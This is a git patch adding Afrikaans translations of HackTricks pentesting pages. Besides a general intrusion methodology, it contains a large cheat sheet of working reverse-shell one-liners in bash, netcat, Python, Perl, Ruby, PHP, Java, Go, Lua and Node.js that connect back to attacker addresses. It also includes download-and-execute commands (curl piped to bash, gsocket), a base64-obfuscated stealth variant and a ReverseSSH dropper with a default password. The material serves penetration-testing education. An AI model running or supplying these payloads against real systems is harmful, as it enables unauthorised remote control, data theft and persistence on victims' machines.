From 1acd9b4de000c51840d34b0bc1a4ec0e26d46d22 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 31 Aug 2024 16:27:43 +0000 Subject: [PATCH] Translated ['generic-methodologies-and-resources/pentesting-methodology. --- SUMMARY.md | 10 +- .../pentesting-methodology.md | 46 +- .../reverse-shells/README.md | 36 ++ .../reverse-shells/full-ttys.md | 134 +++++ .../reverse-shells/linux.md | 362 +++++++++++++ .../reverse-shells/msfvenom.md | 242 +++++++++ .../reverse-shells/windows.md | 506 ++++++++++++++++++ .../pentesting-web/rocket-chat.md | 16 +- 8 files changed, 1315 insertions(+), 37 deletions(-) create mode 100644 generic-methodologies-and-resources/reverse-shells/README.md create mode 100644 generic-methodologies-and-resources/reverse-shells/full-ttys.md create mode 100644 generic-methodologies-and-resources/reverse-shells/linux.md create mode 100644 generic-methodologies-and-resources/reverse-shells/msfvenom.md create mode 100644 generic-methodologies-and-resources/reverse-shells/windows.md diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 374153239..175c94832 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,8 +1,8 @@ # Pentesting Metodologie {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -10,7 +10,7 @@ Leer & oefen GCP Hacking: {% endhint %} @@ -50,18 +50,18 @@ Die eerste ding om te doen wanneer jy **soek na kwesbaarhede in 'n host** is om ### **4-** [Soek diens weergawe exploits](search-exploits.md) -Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om vir jou 'n shell te gee... +Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om jou 'n shell te gee... ### **5-** Pentesting Dienste As daar nie enige fancy exploit vir enige lopende diens is nie, moet jy soek na **gewone misconfigurasies in elke diens wat loop.** -**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Asseblief, soek in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte). +**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte). **Ek wil 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **deel (aangesien dit die mees uitgebreide een is).**\ Ook, 'n klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word. -**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat my weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige). +**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige). #### 5.1 Outomatiese Gereedskap @@ -73,11 +73,11 @@ In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **ko ### 6- [Phishing](phishing-methodology/) -As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, mag jy **moet probeer om 'n paar phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees: +As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, **moet jy dalk probeer om 'n bietjie phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees: -### **7-** [**Kry Shell**](shells/) +### **7-** [**Kry Shell**](reverse-shells/) -Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](shells/). +Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](reverse-shells/). Veral in Windows mag jy hulp nodig hê om **antivirusse te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\ @@ -91,32 +91,32 @@ As jy probleme met die shell het, kan jy hier 'n klein **samestelling van die nu ### **9 -** [**Exfiltrasie**](exfiltration.md) -Jy sal waarskynlik **sommige data van die slagoffer moet onttrek** of selfs **iets** (soos privilige eskalasie skripte) moet **invoer**. **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** +Jy sal waarskynlik moet **data uit die slagoffer onttrek** of selfs **iets inbring** (soos voorregverhoging skrifte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** -### **10- Privilege Eskalasie** +### **10- Voorregverhoging** #### **10.1- Plaaslike Privesc** -As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **privileges te eskaleer.**\ -Hier kan jy 'n **gids vind om privileges plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te eskaleer.**\ +As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog.**\ +Hier kan jy 'n **gids vind om voorregte plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te verhoog.**\ Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan: -* [**Outentisering, Akrediteer, Token privileges en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) +* [**Outentisering, Akrediteer, Token voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) * Hoe [**NTLM werk**](../windows-hardening/ntlm/) * Hoe om [**akrediteer te steel**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows * Sommige truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/) -**Moet nie vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Privilege Eskalasie paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) +**Moet nie vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Voorregverhoging paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) #### **10.2- Domein Privesc** -Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, privileges te eskaleer en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag. +Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, voorregte te verhoog en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag. ### 11 - POST #### **11**.1 - Plundering -Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **privileges** van jou **gebruiker**.\ +Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\ Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md). #### 11.2 - Volharding @@ -129,8 +129,8 @@ TODO: Voltooi volharding Post in Windows & Linux ### 12 - Pivoting Met die **versamelde akrediteer** kan jy toegang tot ander masjiene hê, of dalk moet jy **nuwe hosts ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\ -In hierdie geval kan tunneling nodig wees. Hier kan jy [**'n pos oor tunneling**](tunneling-and-port-forwarding.md) vind.\ -Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, privileges te eskaleer en akrediteer te dump.\ +In hierdie geval kan tonnelering nodig wees. Hier kan jy [**'n pos oor tonnelering vind**](tunneling-and-port-forwarding.md).\ +Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy oulike truuks vind om lateraal te beweeg, voorregte te verhoog en akrediteer te dump.\ Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om op Windows omgewings te pivot. ### MEER @@ -139,7 +139,7 @@ Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie n #### **Exploitering** -* [**Basiese Linux Exploitering**](broken-reference) +* [**Basiese Linux Exploitering**](broken-reference/) * [**Basiese Windows Exploitering**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basiese exploitering gereedskap**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) @@ -158,8 +158,8 @@ As jy belangstel in 'n **hacking loopbaan** en die onhackbare hack - **ons huur {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -167,7 +167,7 @@ Leer & oefen GCP Hacking: {% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md new file mode 100644 index 000000000..8a14345c6 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/README.md @@ -0,0 +1,36 @@ +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + + +# [**Shells - Linux**](linux.md) + +# [**Shells - Windows**](windows.md) + +# [**MSFVenom - CheatSheet**](msfvenom.md) + +# [**Full TTYs**](full-ttys.md) + +# **Outomaties gegenereerde shells** + +* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) +* [**https://www.revshells.com/**](https://www.revshells.com/) +* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator) +* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop) +* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse) +* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/) +* [**https://github.com/xct/xc/**](https://github.com/xct/xc/) +* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/) +* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen) +* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) diff --git a/generic-methodologies-and-resources/reverse-shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md new file mode 100644 index 000000000..6c8aa1d1a --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/full-ttys.md @@ -0,0 +1,134 @@ +# Volle TTYs + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Volle TTY + +Let daarop dat die shell wat jy in die `SHELL` veranderlike stel **moet** wees **gelys binne** _**/etc/shells**_ of `Die waarde vir die SHELL veranderlike is nie in die /etc/shells lêer gevind nie. Hierdie voorval is gerapporteer`. Let ook daarop dat die volgende snippette slegs in bash werk. As jy in 'n zsh is, verander na 'n bash voordat jy die shell verkry deur `bash` te loop. + +#### Python + +{% code overflow="wrap" %} +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' + +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +{% hint style="info" %} +Jy kan die **aantal** **rye** en **kolomme** kry deur **`stty -a`** uit te voer +{% endhint %} + +#### script + +{% code overflow="wrap" %} +```bash +script /dev/null -qc /bin/bash #/dev/null is to not store anything +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +#### socat +```bash +#Listener: +socat file:`tty`,raw,echo=0 tcp-listen:4444 + +#Victim: +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 +``` +### **Spawn shells** + +* `python -c 'import pty; pty.spawn("/bin/sh")'` +* `echo os.system('/bin/bash')` +* `/bin/sh -i` +* `script -qc /bin/bash /dev/null` +* `perl -e 'exec "/bin/sh";'` +* perl: `exec "/bin/sh";` +* ruby: `exec "/bin/sh"` +* lua: `os.execute('/bin/sh')` +* IRB: `exec "/bin/sh"` +* vi: `:!bash` +* vi: `:set shell=/bin/bash:shell` +* nmap: `!sh` + +## ReverseSSH + +'n gerieflike manier vir **interaktiewe skulp toegang**, sowel as **lêer oordragte** en **poort forwarding**, is om die staties-gekoppelde ssh bediener [ReverseSSH](https://github.com/Fahrj/reverse-ssh) op die teiken te plaas. + +Hieronder is 'n voorbeeld vir `x86` met upx-gecomprimeerde binêre. Vir ander binêre, kyk na die [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). + +1. Berei plaaslik voor om die ssh poort forwarding versoek te vang: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -v -l -p 4444 +``` +{% endcode %} + +* (2a) Linux teiken: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* (2b) Windows 10 teiken (vir vroeëre weergawes, kyk na [projek leesmy] (https://github.com/Fahrj/reverse-ssh#features)): + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe + +reverse-ssh.exe -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* As die ReverseSSH poort forwarding versoek suksesvol was, behoort jy nou in staat te wees om in te log met die standaard wagwoord `letmeinbrudipls` in die konteks van die gebruiker wat `reverse-ssh(.exe)` uitvoer: +```bash +# Interactive shell access +ssh -p 8888 127.0.0.1 + +# Bidirectional file transfer +sftp -P 8888 127.0.0.1 +``` +## Geen TTY + +As jy om een of ander rede nie 'n volle TTY kan verkry nie, kan jy **nog steeds met programme interaksie hê** wat gebruikersinvoer verwag. In die volgende voorbeeld word die wagwoord aan `sudo` gegee om 'n lêer te lees: +```bash +expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' +``` +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md new file mode 100644 index 000000000..4efd5762d --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -0,0 +1,362 @@ +# Shells - Linux + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +**As jy vrae het oor enige van hierdie shells kan jy dit nagaan met** [**https://explainshell.com/**](https://explainshell.com) + +## Volle TTY + +**Sodra jy 'n omgekeerde shell kry**[ **lees hierdie bladsy om 'n volle TTY te verkry**](full-ttys.md)**.** + +## Bash | sh +```bash +curl https://reverse-shell.sh/1.1.1.1:3000 | bash +bash -i >& /dev/tcp// 0>&1 +bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done + +#Short and bypass (credits to Dikline) +(sh)0>/dev/tcp/10.10.10.10/9091 +#after getting the previous shell to get the output to execute +exec >&0 +``` +Moet nie vergeet om met ander shells te kyk nie: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, en bash. + +### Simbool veilige shell +```bash +#If you need a more stable connection do: +bash -c 'bash -i >& /dev/tcp// 0>&1' + +#Stealthier method +#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 +echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null +``` +#### Shell verduideliking + +1. **`bash -i`**: Hierdie deel van die opdrag begin 'n interaktiewe (`-i`) Bash-skal. +2. **`>&`**: Hierdie deel van die opdrag is 'n afgekorte notasie vir **om beide standaarduitset** (`stdout`) en **standaardfout** (`stderr`) na die **dieselfde bestemming** te herlei. +3. **`/dev/tcp//`**: Dit is 'n spesiale lêer wat **'n TCP-verbinding na die gespesifiseerde IP-adres en poort** verteenwoordig. +* Deur **die uitset en foutstrome na hierdie lêer te herlei**, stuur die opdrag effektief die uitset van die interaktiewe skalsessie na die aanvaller se masjien. +4. **`0>&1`**: Hierdie deel van die opdrag **herlei standaardinvoer (`stdin`) na die dieselfde bestemming as standaarduitset (`stdout`)**. + +### Skep in lêer en voer uit +```bash +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; +wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh +``` +## Forward Shell + +Wanneer jy met 'n **Remote Code Execution (RCE)** kwesbaarheid binne 'n Linux-gebaseerde webtoepassing werk, kan die verkryging van 'n reverse shell belemmer word deur netwerkverdedigings soos iptables-reëls of ingewikkelde pakketfiltering meganismes. In sulke beperkte omgewings behels 'n alternatiewe benadering die vestiging van 'n PTY (Pseudo Terminal) shell om meer effektief met die gecompromitteerde stelsel te kommunikeer. + +'n Aanbevole hulpmiddel vir hierdie doel is [toboggan](https://github.com/n3rada/toboggan.git), wat interaksie met die teikenomgewing vereenvoudig. + +Om toboggan effektief te gebruik, skep 'n Python-module wat op die RCE-konteks van jou teikenstelsel aangepas is. Byvoorbeeld, 'n module genaamd `nix.py` kan as volg gestruktureer word: +```python3 +import jwt +import httpx + +def execute(command: str, timeout: float = None) -> str: +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) + +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) + +# Check if the request was successful +response.raise_for_status() + +return response.text +``` +En dan kan jy uitvoer: +```shell +toboggan -m nix.py -i +``` +Om 'n interaktiewe skulp direk te benut. Jy kan `-b` byvoeg vir Burpsuite integrasie en die `-i` verwyder vir 'n meer basiese rce-wrapper. + +'n Ander moontlikheid bestaan uit die gebruik van die `IppSec` voorwaartse skulpimplementering [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). + +Jy moet net die volgende aanpas: + +* Die URL van die kwesbare gasheer +* Die voorvoegsel en agtervoegsel van jou payload (indien enige) +* Die manier waarop die payload gestuur word (koppe? data? ekstra inligting?) + +Dan kan jy net **opdragte stuur** of selfs **die `upgrade` opdrag gebruik** om 'n volle PTY te verkry (let daarop dat pype met 'n ongeveer 1.3s vertraging gelees en geskryf word). + +## Netcat +```bash +nc -e /bin/sh +nc | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f +nc | /bin/bash | nc +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## gsocket + +Kyk dit in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) +```bash +bash -c "$(curl -fsSL gsocket.io/x)" +``` +## Telnet +```bash +telnet | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f +telnet | /bin/bash | telnet +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## Whois + +**Aanvaller** +```bash +while true; do nc -l ; done +``` +Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop) + +**Slachtoffer** +```bash +export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done +``` +## Python +```bash +#Linux +export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +#IPv6 +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` +## Perl +```bash +perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## PHP +```php +// Using 'exec' is the most common method, but assumes that the file descriptor will be 3. +// Using this method may lead to instances where the connection reaches out to the listener and then closes. +php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +// Using 'proc_open' makes no assumptions about what the file descriptor will be. +// See https://security.stackexchange.com/a/198944 for more information +$sock, 1=>$sock, 2=>$sock), $pipes); ?> + +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` +## Java +```bash +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +## Ncat +```bash +victim> ncat --ssl -c "bash -i 2>&1" +attacker> ncat -l --ssl +``` +## Golang +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` +## Lua +```bash +#Linux +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +#Windows & Linux +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## NodeJS +```javascript +(function(){ +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') 